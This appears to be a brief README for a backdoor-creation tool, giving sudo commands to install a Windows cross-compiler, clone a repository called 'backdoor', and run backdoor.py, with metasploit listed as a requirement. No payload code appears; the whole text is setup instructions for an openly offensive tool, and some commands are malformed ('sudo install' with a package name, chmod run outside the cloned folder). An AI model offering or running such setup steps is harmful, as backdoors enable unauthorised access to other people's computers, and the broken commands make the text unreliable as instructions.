# BACKDOOR CREATED

> INSTALLATION
        $ sudo install gcc-mingw-w64-i686 
        $ sudo git clone https://github.com/3xploit-db/backdoor 
        $ sudo chmod 755 backdoor.py
        $ sudo ./backdoor.py

> Requests
   metasploit
   
#END OF
